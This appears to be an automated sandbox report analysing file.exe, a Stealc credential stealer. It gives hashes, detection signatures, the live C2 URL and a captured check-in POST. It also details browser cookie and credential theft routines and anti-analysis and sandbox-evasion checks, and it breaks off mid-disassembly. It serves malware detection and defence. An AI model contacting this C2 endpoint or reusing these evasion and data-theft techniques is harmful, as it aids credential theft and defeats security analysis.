
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540851
MD5: c4d992e32dabd4723370d920a842d759
SHA1: e2ba688cb7d4a7c88c964ec875e62529d63057c7
SHA256: fc379207ec04489ab7610663a20efa6827c0ff39c842335048fccc15f202c447
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C4D992E32DABD4723370D920A842D759)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 2796 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 2796 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.140000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T09:07:10.837642+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.140000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0014C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00147240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00147240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00149AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00149B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00158EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00158EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001538B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00154910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00154910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0014DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0014E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0014ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00154570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00154570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0014DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0014BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014F68A FindFirstFileA | 0_2_0014F68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0014F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00153EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00153EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001416D0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBK
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------EHJJKFCBGIDGHIECGCBK
    Content-Disposition: form-data; name="hwid"

    86C5843EB3592398989009
    ------EHJJKFCBGIDGHIECGCBK
    Content-Disposition: form-data; name="build"

    doma
    ------EHJJKFCBGIDGHIECGCBK--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00144880
Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/G
Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171497374.0000000000E34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm:
Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/r

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 | 0_2_00511898
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042A89F | 0_2_0042A89F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00516106 | 0_2_00516106
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051C93F | 0_2_0051C93F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00517922 | 0_2_00517922
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00508924 | 0_2_00508924
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051B215 | 0_2_0051B215
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050DA95 | 0_2_0050DA95
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FC2A1 | 0_2_004FC2A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051936D | 0_2_0051936D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B1B44 | 0_2_003B1B44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00485BDE | 0_2_00485BDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0059BB87 | 0_2_0059BB87
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005853B7 | 0_2_005853B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D6C2E | 0_2_003D6C2E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051E41C | 0_2_0051E41C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050F4BD | 0_2_0050F4BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005075DD | 0_2_005075DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004A9E47 | 0_2_004A9E47
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050A65E | 0_2_0050A65E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0042FE13 | 0_2_0042FE13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051469D | 0_2_0051469D
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 001445C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: wyvqzkuk ZLIB complexity 0.9950803860792885
Source: file.exe, 00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00159600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00159600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00153720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00153720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\TINCAT1Z.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookiesp;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1854464 > 1048576
Source: file.exe | Static PE information: Raw size of wyvqzkuk is bigger than: 0x100000 < 0x19ea00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.140000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00159860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00159860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d22e7 should be: 0x1c68ed
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: wyvqzkuk
Source: file.exe | Static PE information: section name: kejrglww
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015B035 push ecx; ret | 0_2_0015B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F4879 push 3BF8FBD9h; mov dword ptr [esp], edx | 0_2_004F48AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E203C push 2673D848h; mov dword ptr [esp], eax | 0_2_007E2056
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E203C push eax; mov dword ptr [esp], ebx | 0_2_007E20EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E203C push edx; mov dword ptr [esp], ebx | 0_2_007E2100
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E2020 push esi; mov dword ptr [esp], edx | 0_2_007E2001
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E2020 push 7AA0B184h; mov dword ptr [esp], ecx | 0_2_007E2013
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E2020 push 2673D848h; mov dword ptr [esp], eax | 0_2_007E2056
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E2020 push eax; mov dword ptr [esp], ebx | 0_2_007E20EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E2020 push edx; mov dword ptr [esp], ebx | 0_2_007E2100
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015E075 push es; retf | 0_2_0015E076
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015E077 push es; retf | 0_2_0015E07A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060C00B push edi; mov dword ptr [esp], eax | 0_2_0060C02C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005BD0F8 push ecx; mov dword ptr [esp], eax | 0_2_005BD13A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062F8A1 push 5E66EB9Ah; mov dword ptr [esp], ebx | 0_2_0062F8CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062F8A1 push 25ACF67Ch; mov dword ptr [esp], esp | 0_2_0062F8F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062F8A1 push 244E9266h; mov dword ptr [esp], esp | 0_2_0062F927
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push eax; mov dword ptr [esp], edx | 0_2_005118C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push ebp; mov dword ptr [esp], esp | 0_2_005118CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push edx; mov dword ptr [esp], 7D0A6EF1h | 0_2_005118D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push eax; mov dword ptr [esp], 00000004h | 0_2_005118E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push eax; mov dword ptr [esp], ebx | 0_2_005119AE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push 7E4C582Fh; mov dword ptr [esp], edx | 0_2_005119C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push edi; mov dword ptr [esp], 44E06225h | 0_2_005119FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push 256D0FB8h; mov dword ptr [esp], edx | 0_2_00511A13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push 3ABF3FBCh; mov dword ptr [esp], ecx | 0_2_00511A1D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push ebx; mov dword ptr [esp], ebp | 0_2_00511A6A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push ecx; mov dword ptr [esp], edx | 0_2_00511A73
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push edi; mov dword ptr [esp], ecx | 0_2_00511A7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push edx; mov dword ptr [esp], esi | 0_2_00511A9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511898 push ecx; mov dword ptr [esp], eax | 0_2_00511AEE
Source: file.exe | Static PE information: section name: wyvqzkuk entropy: 7.95409499130381

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00159860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00159860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13756
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3A1BB0 second address: 3A1BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3A1BB6 second address: 3A1BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3A1BBA second address: 3A1BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5236D0 second address: 5236D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5236D9 second address: 5236E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F8480C71BF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52385A second address: 523860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 523860 second address: 52386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8480C71BF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 52386A second address: 52386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 523983 second address: 523992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71BFAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 523C36 second address: 523C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E31393h 0x00000007 jmp 00007F8480E3138Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 523C58 second address: 523C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8480C71C06h 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F8480C71BF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525658 second address: 3A1BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xor dword ptr [esp], 6C7E06CDh 0x0000000d push ecx 0x0000000e sub dword ptr [ebp+122D214Fh], ecx 0x00000014 pop ecx 0x00000015 push dword ptr [ebp+122D019Dh] 0x0000001b push edx 0x0000001c mov ecx, 0491D081h 0x00000021 pop edx 0x00000022 call dword ptr [ebp+122D19B7h] 0x00000028 pushad 0x00000029 cld 0x0000002a xor eax, eax 0x0000002c pushad 0x0000002d mov eax, 586B7E9Bh 0x00000032 mov ebx, dword ptr [ebp+122D2AF3h] 0x00000038 popad 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d sub dword ptr [ebp+122D275Ch], eax 0x00000043 mov dword ptr [ebp+122D2A63h], eax 0x00000049 mov dword ptr [ebp+122D275Ch], edx 0x0000004f mov esi, 0000003Ch 0x00000054 mov dword ptr [ebp+122D275Ch], edx 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e js 00007F8480E3138Ch 0x00000064 mov dword ptr [ebp+122D275Ch], esi 0x0000006a lodsw 0x0000006c mov dword ptr [ebp+122D275Ch], ebx 0x00000072 je 00007F8480E31390h 0x00000078 pushad 0x00000079 push edi 0x0000007a pop edx 0x0000007b jg 00007F8480E31386h 0x00000081 popad 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 add dword ptr [ebp+122D275Ch], edx 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 jno 00007F8480E3138Dh 0x00000096 nop 0x00000097 push eax 0x00000098 push edx 0x00000099 pushad 0x0000009a jmp 00007F8480E3138Ah 0x0000009f jnc 00007F8480E31386h 0x000000a5 popad 0x000000a6 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52568E second address: 525692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525692 second address: 52571E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8480E31386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8480E3138Bh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 mov dword ptr [ebp+122D1AA9h], esi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F8480E31388h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 call 00007F8480E31389h 0x0000003e push esi 0x0000003f jg 00007F8480E3138Ch 0x00000045 pop esi 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jmp 